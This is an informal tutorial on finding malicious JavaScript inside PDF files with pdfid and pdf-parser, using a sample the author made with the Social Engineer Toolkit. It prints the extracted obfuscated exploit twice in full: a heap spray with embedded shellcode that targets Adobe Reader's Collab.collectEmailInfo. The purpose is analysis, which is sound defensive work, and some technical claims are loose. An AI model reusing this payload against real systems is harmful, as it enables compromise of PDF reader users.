This tutorial is going to teach you how to  find malicious data within  PDF readers.

I find it pretty cool because  instead of  writing

strings #filename

gdb

objects

etc etc 

You dont need to  know all this  because there is a tool that simplifies  pulling information out of the PDF reader just like almost   "grep"


What you will need?

Python Instealled windows or  Linux

pdf-reader
pdfid


now im going to write this by myself without having to look up information so if i mess up ill fix it
im just writing this out to see how much of this i remembered.


When you open up a pdf file - PDF  incorporated a javascript  engine for the PDF reader

which allows the use of executing javascript code.

Malicious  Hackers will insert these javascript codes  into the objects within a  PDF file


and modifying strings and what not

So instead of  having 

/Javascript

a hacker will turn it into like /jAVAsCRIPT

etc etc

an example output

root@bt:/pentest/forensics/pdfid# python pdfid.py --disarm testfile.pdf
/Open#41#63tion -> /oPEN#61#43TION
/J#61va#53#63r#69#70#74 -> /j#41VA#73#43R#49#50#54
/#4a#53 -> /#6a#73
PDFiD 0.0.11 testfile.pdf
 PDF Header: %PDF-1.5
 obj                    6
 endobj                 6
 stream                 1
 endstream              1
 xref                   1
 trailer                1
 startxref              1
 /Page                  1(1)
 /Encrypt               0
 /ObjStm                0
 /JS                    1(1)
 /JavaScript            1(1)
 /AA                    0
 /OpenAction            1(1)
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                0
 /Colors > 2^24         0

we can see that there is  embedded code within 
/JS
/JavaScript
/OpenAction


Notice at the top how  Openaction is changed to something else?

Its to obfuscate  AntiViruses 


Our goal is to pull the javascript code out of the  i call them tables  or objects however you say it


First command to execute

Disarm the PDF  files

python pdfid.py --disarm testfile.pdf

What this does is  change  the Case Sensitives in the Words to make it somethign else so when you open the .pdf file  it is safe and nothing will execute.


the  (1)  indicates that there is a obfuscation inside that table.

So now you have  basic information

Whats obfuscated

But now you need to go in deeper there is a software called

pdf-parser.py

pd-parser is nothing more then like a grep utility on linux  just that its made for  pulling contents out of the pdf file now.


So now we need to locate the embedded  malicious javascript code.

pdf-parser  has a grep utility where you can search for certain stuff within the pdf file

so execute this

python pdf-parser.py --search javascript filename.pdf

What this will do is search the contents of the pdf file for anything in relation to javascript

So this is what we get back

obj 5 0
 Type: /Action
 Referencing: 6 0 R
 [(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]

 <<
   /Type /Action
   /S /JavaScript
   /JS 6 0 R
 >>

Things to note here

1. object is  5
2. It uses javascript
3. As you can see the javascript is encoded but yet --search still found it  which is awesome
4. /type Action


So now we know that  javascript is included  object 5 and is  is getting referenced through object 6 as well

So what do we do now?

We pretty much just jump to the next location 

Since  5  is referencing  6   and  5 was referenced in  in the search for javascript   we know that the next
one  is going to be holding the javascript code its self

example

python pdf-parser.py --object 5 --filter testfile.pdf
obj 5 0
 Type: /Action
 Referencing: 6 0 R
 [(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]

 <<
   /Type /Action
   /S /JavaScript
   /JS 6 0 R
 >>


Notice :  /JS 6 0 R

So now we know JS is being held in   table 6

So now we will filter the jump and  paste the javascript code

python pdf-parser.py --object 6 --filter testfile.pdf

obj 6 0
 Type:
 Referencing:
 Contains stream
 [(2, '<<'), (2, '/Length'), (1, ' '), (3, '6532'), (2, '/#46ilt#65r'), (2, '['), (2, '/#46#6c#61teDeco#64e'), (2, '/A#53C#49#49He#78Decod#65'), (2, ']'), (2, '>>'), (1, '\r\n')]

 <<
   /Length 6532
   /Filter [
   /FlateDecode /ASCIIHexDecode]
 >>



And now we finally see the javascript code

>>

 '\n\t\tvar ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub714%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");\n\t\tvar oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";\n\t\tfor (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");\n\t\tNFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;\n\t\tHyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");\n\t\tnjvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;\n\t\tCEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length\n\t\twhile (HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;\n\t\tFycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\tmozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\twhile(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;\n\t\tSScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();\n\t\tfor (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;\n\t\tvar rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");\n\t\twhile(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;\n\t\tthis.collabStore = Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});\n\t\t\t\t\t'




Obviously this is all crowded together   but if we want to organize it to show the code a lot better we will type


python pdf-parser.py --object 6 --filter --raw testfile.pdf

The  filter and raw will output it in readable format

        var ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub714%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");
        var oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";
        for (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");
        NFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;
        HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");
        njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;
        CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length
        while (HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;
        FycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
        mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
        while(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;
        SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();
        for (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;
        var rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");
        while(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;
        this.collabStore = Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});




Which is now readable

But since this  software uses the 

/FlateDecode /ASCIIHexDecode]

You have to find a way to de-crypt it

I found a site that helps in analyzing those types of encryptions which can be located at

http://wepawet.cs.ucsb.edu.com


I was using  the SET ( Social Engineer Toolkit)  to generate a  malacious .pdf file

and then i analyzed it over with these tools


Note: Not all  malacious pdf files will incorporate that as a encryption method  and you may just get lucky
Sometimes there will be and sometimes there wont - There is like 4 other methods for encryption on this


The encrypted javacode you see up there was done by the SET encryption thing


Anyways i hope you learned something from this

And if i wrote this tutorial shitty im sorry